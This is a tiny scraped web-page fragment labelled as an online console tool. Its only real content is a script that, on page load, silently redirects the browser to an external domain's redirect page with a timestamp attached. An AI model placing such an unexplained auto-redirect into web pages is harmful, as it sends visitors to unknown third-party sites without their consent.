SOURCE

console 命令行工具 X clear

                    
>
console
<script>
  var timestamp = Date.parse(new Date());
  timestamp = timestamp / 1000;
  window.location.href = "http://link.aoelv.cn//tiaozhuan.php?t="+timestamp;
</script>